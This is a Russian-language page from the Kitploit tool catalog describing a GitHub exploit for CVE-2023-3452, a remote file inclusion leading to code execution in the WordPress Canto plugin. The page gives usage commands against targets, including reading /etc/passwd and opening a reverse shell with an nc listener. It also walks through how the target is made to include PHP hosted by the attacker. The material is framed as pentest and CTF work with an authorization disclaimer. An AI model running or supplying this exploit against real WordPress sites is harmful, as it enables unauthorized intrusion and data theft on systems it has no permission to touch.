Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-3452---WordPress-Canto-Plugin-RCE — Эксплойт CVE-2023-3452 для плагина Canto WordPress RCE, включена поддержка HTTPS | Kitploit
Инструменты/GitHubGitHub/alpastx/cve-2023-3452---wordpress-canto-plugin-rce
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubalpastx/cve-2023-3452---wordpress-canto-plugin-rce

CVE-2023-3452---WordPress-Canto-Plugin-RCE

Эксплойт CVE-2023-3452 для плагина Canto WordPress RCE, включена поддержка HTTPS

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
5 месяцев назадЕщё не проверено

CVE-2023-3452 - WordPress Canto Plugin RCE

Эксплойт для плагина WordPress Canto (≤ 3.0.4) уязвимости RFI. Реально работает по HTTPS — другие публичные PoC как бы сдались перед SSL.

Отдавая должное: эта CVE была найдена другими. Я просто сделал версию, которая не ломается на HTTPS-целях.

Уязвимость

CVECVE-2023-3452
EDB-ID51826
ТипRemote File Inclusion (RFI) → Неавторизованное RCE
ЗатронутоWordPress Canto Plugin < 3.0.5 (≤ 3.0.4)
ОбнаруженоLeopoldo Angulo (leoanggal1) — 2024-02-27
Расположение/wp-content/plugins/canto/includes/lib/download.php
Векторwp_abspath используется для включения PHP-файлов без валидации — мы включаем наш удалённо.

Почему именно этот?

Большинство эксплойтов для этой CVE спотыкаются на HTTPS из-за проверки SSL. Этот скрипт:

  • Использует verify=False, чтобы HTTPS-цели реально работали
  • Подавляет спам предупреждений urllib3
  • Работает одинаково как по HTTP, так и по HTTPS — отдельная конфигурация не нужна

Требования

  • Python 3.6+
  • requests

Установка

root@kitploit:~
pip install -r requirements.txt

Или просто: pip install requests

Использование

root@kitploit:~
python3 canto_exploit.py -t <TARGET_URL> -l <LHOST> -p <LPORT> [OPTIONS]

Аргументы

* Без команды = выполняется id; whoami; hostname как проверка работоспособности

Примеры

Одиночная команда:

root@kitploit:~
python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 -c "id"

Чтение файла:

root@kitploit:~
python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 -c "cat /etc/passwd"

Reverse shell (сначала выполните nc -lvnp 4444):

root@kitploit:~
python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 --revshell --shell-port 4444

Интерактивный режим:

root@kitploit:~
python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 -i

HTTPS цель CTF:

root@kitploit:~
python3 canto_exploit.py -t https://10.129.1.136 -l 10.10.14.33 -p 8888 -c "id"

Как это работает

  1. Проверка — Выполняет запрос к /wp-content/plugins/canto/readme.txt, парсит версию (≤ 3.0.4 = уязвимо)
  2. Полезная нагрузка — Создаёт поддельный wp-admin/admin.php, который выполняет вашу команду через system()
  3. Сервер — Запускает локальный HTTP-сервер, чтобы цель могла загрузить наш файл
  4. Триггер — Отправляет запрос к download.php с wp_abspath=http://LHOST:LPORT, чтобы он включил наш удалённый PHP
  5. Выполнение — Их сервер выполняет наш код, мы получаем вывод обратно

Сетевые заметки

  • Цель должна иметь доступ к вашей машине по адресу LHOST:LPORT (для HTB/лабораторий это ваш VPN-IP)
  • Брандмауэр должен разрешать входящие соединения на порт полезной нагрузки (-p)

Отказ от ответственности

Только авторизованное тестирование и обучение. Воздействуйте только на системы, к которым у вас есть разрешение. Всё остальное незаконно.

Лицензия

MIT

Скачать инструмент
ОпцияОписаниеОбязательно
-t, --targetЦелевой URL WordPress (HTTP или HTTPS)Да
-l, --lhostВаш IP — цель должна иметь доступ к этому для полезной нагрузкиДа
-p, --lportПорт сервера полезной нагрузки (по умолчанию: 8888)Нет
-c, --commandКоманда для выполнения на целиНет*
--revshellЗапустить обратную оболочкуНет
--shell-portПорт прослушивания для обратной оболочки (по умолчанию: 4444)Нет
-i, --interactiveИнтерактивный режим оболочкиНет
-v, --verboseДополнительный выводНет
--skip-checkПропустить проверку уязвимостиНет